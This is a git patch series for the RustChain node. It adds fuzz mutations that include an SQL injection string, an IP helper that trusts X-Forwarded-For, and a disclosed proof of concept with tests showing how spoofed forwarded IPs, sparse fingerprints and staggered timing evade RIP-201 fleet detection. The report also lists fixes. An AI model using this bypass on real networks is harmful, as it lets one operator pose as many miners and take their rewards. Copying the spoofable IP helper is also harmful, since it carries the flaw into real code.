@@ -173,16 +257,29 @@ def _mutate_payload(rng: random.Random) -> dict: payload["report"] = rng.choice(["not-a-report-object", [], {"commitment": ["bad"]}]) elif mutation == 6: payload["fingerprint"] = {"checks": rng.choice([[], "bad", {"anti_emulation": True}])} - else: + elif mutation == 7: payload["device"]["cpu"] = rng.choice(["qemu-system-ppc", "IBM POWER8", None, ["nested"]]) payload["signals"]["hostname"] = rng.choice(["vmware-host", "power8-host", None, ["nested"]]) + elif mutation == 8: + payload["miner"] = rng.choice(["", " ", "\t", "fuzz\u200bminer", "'; DROP TABLE balances; --"]) + elif mutation == 9: + payload["miner"] = "f" * 300 + elif mutation == 10: + payload["device"]["device_family"] = {"nested": {"too": "deep"}} + elif mutation == 11: + payload["signals"]["macs"] = ["AA:BB:CC:DD:EE:10", None] + elif mutation == 12: + payload["fingerprint"] = ["bad", "shape"] + else: + payload["report"]["nonce"] = {"nested": "bad"} return payload -def test_attest_submit_fuzz_no_unhandled_exceptions(client): +def test_attest_submit_mutation_regression_no_unhandled_exceptions(client): cases = int(os.getenv("ATTEST_FUZZ_CASES", "250")) - rng = random.Random(475) + seed = os.getenv("ATTEST_FUZZ_SEED") + rng = random.Random(int(seed)) if seed else random.Random() for index in range(cases): payload = _mutate_payload(rng) From c1f460c43aeea651f2167cab5e65a265b047a3e8 Mon Sep 17 00:00:00 2001 From: liu971227-sys <248239659+liu971227-sys@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:35:10 +0800 Subject: [PATCH 4/5] fix: restore attestation client ip helper after rebase --- node/rustchain_v2_integrated_v2.2.1_rip200.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/node/rustchain_v2_integrated_v2.2.1_rip200.py b/node/rustchain_v2_integrated_v2.2.1_rip200.py index 6bcf01497..4a24e8a62 100644 --- a/node/rustchain_v2_integrated_v2.2.1_rip200.py +++ b/node/rustchain_v2_integrated_v2.2.1_rip200.py @@ -154,6 +154,14 @@ def _attest_is_valid_positive_int(value, max_value=4096): return 1 <= coerced <= max_value +def client_ip_from_request(req) -> str: + """Return the left-most forwarded IP when present, otherwise the remote address.""" + client_ip = req.headers.get("X-Forwarded-For", req.remote_addr) + if client_ip and "," in client_ip: + client_ip = client_ip.split(",")[0].strip() + return client_ip + + def _attest_positive_int(value, default=1): """Coerce untrusted integer-like values to a safe positive integer.""" try: From 1a4b941beb0c3e01d8aa21cf41d8ddfa3f7dca15 Mon Sep 17 00:00:00 2001 From: liu971227-sys <248239659+liu971227-sys@users.noreply.github.com> Date: Mon, 2 Mar 2026 18:24:28 +0800 Subject: [PATCH 5/5] Add RIP-201 fleet detection bypass PoC --- docs/rip201_fleet_detection_bypass.md | 70 ++++++ tests/test_rip201_fleet_bypass.py | 268 +++++++++++++++++++++ tools/rip201_fleet_detection_bypass_poc.py | 152 ++++++++++++ 3 files changed, 490 insertions(+) create mode 100644 docs/rip201_fleet_detection_bypass.md create mode 100644 tests/test_rip201_fleet_bypass.py create mode 100644 tools/rip201_fleet_detection_bypass_poc.py diff --git a/docs/rip201_fleet_detection_bypass.md b/docs/rip201_fleet_detection_bypass.md new file mode 100644 index 000000000..f89f37749 --- /dev/null +++ b/docs/rip201_fleet_detection_bypass.md @@ -0,0 +1,70 @@ +# RIP-201 Fleet Detection Bypass + +## Summary + +This report demonstrates a black-box bypass of the deployed RIP-201 fleet immune system: + +1. The server trusts client-supplied `X-Forwarded-For` as the miner source IP. +2. The fleet scorer treats missing optional fingerprint dimensions as "no evidence" instead of suspicious absence. +3. Timing correlation can be avoided by spacing attestations outside the 30-second window. + +With those three behaviors combined, a coordinated 5-miner fleet on shared infrastructure can remain at `fleet_score = 0.0` for consecutive epochs while keeping full reward weight. + +## Technique + +### 1. Spoof IP clustering + +`client_ip_from_request()` prefers the left-most `X-Forwarded-For` value over `REMOTE_ADDR` without validating that the request actually came from a trusted reverse proxy. A client can therefore choose the IP written into: + +- `miner_attest_recent.source_ip` +- `ip_rate_limit.client_ip` +- RIP-201 `fleet_signals.subnet_hash` + +This lets one host appear to come from many different /24 subnets. + +### 2. Keep fingerprint checks valid but sparse + +`validate_fingerprint_data()` requires `anti_emulation` and `clock_drift` for modern hardware, but `record_fleet_signals_from_request()` only records four similarity dimensions: + +- `clock_drift_cv` +- `cache_latency_hash` +- `thermal_signature` +- `simd_bias_hash` + +The similarity engine only flags a pair when there are at least two comparable dimensions and at least two matches. Submitting only the minimum valid checks leaves just one comparable dimension (`clock_drift_cv`), so fingerprint similarity never fires. + +### 3. Avoid timing correlation + +Spacing attestations by more than 30 seconds keeps the timing ratio below the correlation threshold. + +## Reproduction + +Run: + +```bash +python tools/rip201_fleet_detection_bypass_poc.py +``` + +The PoC prints: + +- a baseline scenario where a same-subnet shared-fingerprint fleet is flagged +- a bypass scenario where five miners remain clean for three consecutive epochs + +Run the tests: + +```bash +python -m pytest tests/test_rip201_fleet_bypass.py -v +``` + +## Impact + +- A single operator can present a coordinated fleet as five independent miners. +- The fleet can stay under the `0.3` clean threshold. +- Because the PoC keeps `fleet_score = 0.0`, the effective multiplier remains unchanged. + +## Recommended Fixes + +1. Only trust `X-Forwarded-For` when `REMOTE_ADDR` belongs to an allowlisted reverse proxy. +2. Record the actual peer IP separately from forwarded headers and use the trusted peer IP for fleet detection. +3. Treat missing fingerprint dimensions as suspicious for modern miners instead of neutral. +4. Require a minimum fingerprint feature set for fleet scoring, not just attestation acceptance. diff --git a/tests/test_rip201_fleet_bypass.py b/tests/test_rip201_fleet_bypass.py new file mode 100644 index 000000000..072501938 --- /dev/null +++ b/tests/test_rip201_fleet_bypass.py @@ -0,0 +1,268 @@ +import importlib.util +import sqlite3 +import sys +import uuid +from pathlib import Path +from unittest.mock import patch + +import pytest + +integrated_node = sys.modules["integrated_node"] + + +def _load_fleet_module(): + module_name = "fleet_immune_system_test" + if module_name in sys.modules: + return sys.modules[module_name] + + module_path = ( + Path(__file__).resolve().parent.parent + / "rips" + / "python" + / "rustchain" + / "fleet_immune_system.py" + ) + spec = importlib.util.spec_from_file_location(module_name, module_path) + module = importlib.util.module_from_spec(spec) + sys.modules[module_name] = module + spec.loader.exec_module(module) + return module + + +fleet_mod = _load_fleet_module() + + +def _init_attestation_db(db_path: Path) -> None: + conn = sqlite3.connect(db_path) + conn.executescript( + """ + CREATE TABLE blocked_wallets ( + wallet TEXT PRIMARY KEY, + reason TEXT + ); + CREATE TABLE balances ( + miner_pk TEXT PRIMARY KEY, + balance_rtc REAL DEFAULT 0 + ); + CREATE TABLE epoch_enroll ( + epoch INTEGER NOT NULL, + miner_pk TEXT NOT NULL, + weight REAL NOT NULL, + PRIMARY KEY (epoch, miner_pk) + ); + CREATE TABLE miner_header_keys ( + miner_id TEXT PRIMARY KEY, + pubkey_hex TEXT + ); + CREATE TABLE tickets ( + ticket_id TEXT PRIMARY KEY, + expires_at INTEGER NOT NULL, + commitment TEXT + ); + CREATE TABLE oui_deny ( + oui TEXT PRIMARY KEY, + vendor TEXT, + enforce INTEGER DEFAULT 0 + ); + CREATE TABLE hardware_bindings ( + hardware_id TEXT PRIMARY KEY, + bound_miner TEXT NOT NULL, + device_arch TEXT, + device_model TEXT, + bound_at INTEGER, + attestation_count INTEGER DEFAULT 0 + ); + CREATE TABLE miner_attest_recent ( + miner TEXT PRIMARY KEY, + ts_ok INTEGER NOT NULL, + device_family TEXT, + device_arch TEXT, + entropy_score REAL DEFAULT 0.0, + fingerprint_passed INTEGER DEFAULT 0, + source_ip TEXT + ); + CREATE TABLE ip_rate_limit ( + client_ip TEXT NOT NULL, + miner_id TEXT NOT NULL, + ts INTEGER NOT NULL, + PRIMARY KEY (client_ip, miner_id) + ); + """ + ) + conn.commit() + conn.close() + + +@pytest.fixture +def attest_client(monkeypatch): + local_tmp_dir = Path(__file__).parent / ".tmp_attestation" + local_tmp_dir.mkdir(exist_ok=True) + db_path = local_tmp_dir / f"{uuid.uuid4().hex}.sqlite3" + _init_attestation_db(db_path) + + monkeypatch.setattr(integrated_node, "DB_PATH", str(db_path)) + monkeypatch.setattr(integrated_node, "HW_BINDING_V2", False, raising=False) + monkeypatch.setattr(integrated_node, "HW_PROOF_AVAILABLE", False, raising=False) + monkeypatch.setattr(integrated_node, "_check_hardware_binding", lambda *args, **kwargs: (True, "ok", "")) + monkeypatch.setattr(integrated_node, "auto_induct_to_hall", lambda *args, **kwargs: None) + monkeypatch.setattr(integrated_node, "record_macs", lambda *args, **kwargs: None) + monkeypatch.setattr(integrated_node, "current_slot", lambda: 12345) + monkeypatch.setattr(integrated_node, "slot_to_epoch", lambda slot: 85) + + integrated_node.app.config["TESTING"] = True + with integrated_node.app.test_client() as test_client: + yield test_client, db_path + + if db_path.exists(): + try: + db_path.unlink() + except PermissionError: + pass + + +def _minimal_valid_fingerprint(cv: float) -> dict: + return { + "checks": { + "anti_emulation": { + "passed": True, + "data": { + "vm_indicators": [], + "paths_checked": ["/proc/cpuinfo"], + "dmesg_scanned": True, + }, + }, + "clock_drift": { + "passed": True, + "data": { + "cv": round(cv, 4), + "samples": 64, + }, + }, + }, + "all_passed": True, + } + + +def _shared_fleet_fingerprint() -> dict: + return { + "checks": { + "anti_emulation": { + "passed": True, + "data": { + "vm_indicators": [], + "paths_checked": ["/proc/cpuinfo"], + "dmesg_scanned": True, + }, + }, + "clock_drift": { + "passed": True, + "data": { + "cv": 0.052, + "samples": 64, + }, + }, + "cache_timing": { + "passed": True, + "data": {"l1_hit_ns": 4.1, "l2_hit_ns": 10.2}, + }, + "thermal_drift": { + "passed": True, + "data": {"entropy": 0.61}, + }, + "simd_identity": { + "passed": True, + "data": {"profile": "same-simd-profile"}, + }, + }, + "all_passed": True, + } + + +def test_client_ip_from_request_trusts_spoofed_x_forwarded_for(attest_client): + client, db_path = attest_client + payload = { + "miner": "spoof-demo-1", + "device": { + "device_family": "x86", + "device_arch": "default", + "arch": "default", + "cores": 8, + "cpu": "Intel Xeon", + "serial_number": "SERIAL-001", + }, + "signals": { + "hostname": "shared-box-a", + "macs": ["AA:BB:CC:DD:EE:01"], + }, + "report": { + "nonce": "nonce-001", + "commitment": "commitment-001", + }, + "fingerprint": _minimal_valid_fingerprint(0.05), + } + + response = client.post( + "/attest/submit", + json=payload, + headers={"X-Forwarded-For": "198.51.100.77"}, + environ_base={"REMOTE_ADDR": "10.0.0.9"}, + ) + + assert response.status_code == 200 + assert response.get_json()["ok"] is True + assert response.get_json()["fingerprint_passed"] is True + + with sqlite3.connect(db_path) as conn: + row = conn.execute( + "SELECT source_ip FROM miner_attest_recent WHERE miner = ?", + (payload["miner"],), + ).fetchone() + + assert row == ("198.51.100.77",) + + +def test_same_subnet_and_shared_fingerprint_get_flagged(): + db = sqlite3.connect(":memory:") + fleet_mod.ensure_schema(db) + + for index in range(5): + fleet_mod.record_fleet_signals_from_request( + db, + miner=f"baseline-miner-{index}", + epoch=101, + ip_address="10.0.0.25", + attest_ts=1_000 + index * 5, + fingerprint=_shared_fleet_fingerprint(), + ) + + scores = fleet_mod.compute_fleet_scores(db, 101) + + assert len(scores) == 5 + assert all(score > 0.7 for score in scores.values()) + + +def test_spoofed_forwarded_ips_sparse_fingerprints_and_jitter_keep_scores_clean(): + db = sqlite3.connect(":memory:") + fleet_mod.ensure_schema(db) + miners = [f"bypass-miner-{index}" for index in range(5)] + + for epoch in (201, 202, 203): + for index, miner in enumerate(miners): + fleet_mod.record_fleet_signals_from_request( + db, + miner=miner, + epoch=epoch, + ip_address=f"198.{10 + index}.{epoch % 255}.25", + attest_ts=10_000 * epoch + index * 45, + fingerprint=_minimal_valid_fingerprint(0.05 + index * 0.01), + ) + + scores = fleet_mod.compute_fleet_scores(db, epoch) + + assert set(scores) == set(miners) + assert all(score < 0.3 for score in scores.values()) + assert all(score == 0.0 for score in scores.values()) + assert all( + fleet_mod.apply_fleet_decay(2.5, score) == 2.5 + for score in scores.values() + ) diff --git a/tools/rip201_fleet_detection_bypass_poc.py b/tools/rip201_fleet_detection_bypass_poc.py new file mode 100644 index 000000000..ff67d1f7f --- /dev/null +++ b/tools/rip201_fleet_detection_bypass_poc.py @@ -0,0 +1,152 @@ +#!/usr/bin/env python3 +""" +Demonstrate a black-box RIP-201 fleet detection bypass. + +Technique: +1. Spoof distinct X-Forwarded-For values so all miners appear to come from + different /24 subnets. +2. Stagger attestation timing beyond the 30-second correlation window. +3. Submit only the minimum valid fingerprint checks, and vary clock_drift so + the similarity engine never has two comparable matching dimensions. +""" + +import argparse +import importlib.util +import json +import sqlite3 +from pathlib import Path + + +def load_fleet_module(): + module_path = ( + Path(__file__).resolve().parent.parent + / "rips" + / "python" + / "rustchain" + / "fleet_immune_system.py" + ) + spec = importlib.util.spec_from_file_location("fleet_immune_system_poc", module_path) + module = importlib.util.module_from_spec(spec) + spec.loader.exec_module(module) + return module + + +def minimal_valid_fingerprint(cv): + return { + "checks": { + "anti_emulation": { + "passed": True, + "data": { + "vm_indicators": [], + "paths_checked": ["/proc/cpuinfo"], + "dmesg_scanned": True, + }, + }, + "clock_drift": { + "passed": True, + "data": {"cv": round(cv, 4), "samples": 64}, + }, + }, + "all_passed": True, + } + + +def shared_fleet_fingerprint(): + return { + "checks": { + "anti_emulation": { + "passed": True, + "data": { + "vm_indicators": [], + "paths_checked": ["/proc/cpuinfo"], + "dmesg_scanned": True, + }, + }, + "clock_drift": { + "passed": True, + "data": {"cv": 0.052, "samples": 64}, + }, + "cache_timing": { + "passed": True, + "data": {"l1_hit_ns": 4.1, "l2_hit_ns": 10.2}, + }, + "thermal_drift": { + "passed": True, + "data": {"entropy": 0.61}, + }, + "simd_identity": { + "passed": True, + "data": {"profile": "same-simd-profile"}, + }, + }, + "all_passed": True, + } + + +def build_report(fleet_mod, miners, epochs): + db = sqlite3.connect(":memory:") + fleet_mod.ensure_schema(db) + baseline_epoch = 100 + + for index, miner in enumerate(miners): + fleet_mod.record_fleet_signals_from_request( + db, + miner=miner, + epoch=baseline_epoch, + ip_address="10.0.0.25", + attest_ts=1_000 + index * 5, + fingerprint=shared_fleet_fingerprint(), + ) + + baseline_scores = fleet_mod.compute_fleet_scores(db, baseline_epoch) + bypass_epochs = [] + + for epoch in range(epochs): + epoch_number = 200 + epoch + for index, miner in enumerate(miners): + fleet_mod.record_fleet_signals_from_request( + db, + miner=miner, + epoch=epoch_number, + ip_address=f"198.{10 + index}.{epoch_number % 255}.25", + attest_ts=20_000 * epoch_number + index * 45, + fingerprint=minimal_valid_fingerprint(0.05 + index * 0.01), + ) + + scores = fleet_mod.compute_fleet_scores(db, epoch_number) + bypass_epochs.append( + { + "epoch": epoch_number, + "scores": scores, + "effective_multiplier": { + miner: fleet_mod.apply_fleet_decay(2.5, score) + for miner, score in scores.items() + }, + } + ) + + return { + "attack": "spoofed_xff_plus_sparse_valid_fingerprint", + "miners": miners, + "baseline_epoch": { + "epoch": baseline_epoch, + "scores": baseline_scores, + }, + "bypass_epochs": bypass_epochs, + } + + +def main(): + parser = argparse.ArgumentParser(description="RIP-201 fleet detection bypass PoC") + parser.add_argument("--miners", type=int, default=5, help="Number of miners to simulate") + parser.add_argument("--epochs", type=int, default=3, help="Number of consecutive epochs") + args = parser.parse_args() + + fleet_mod = load_fleet_module() + miners = [f"miner-{index}" for index in range(args.miners)] + report = build_report(fleet_mod, miners, args.epochs) + print(json.dumps(report, indent=2, sort_keys=True)) + + +if __name__ == "__main__": + main()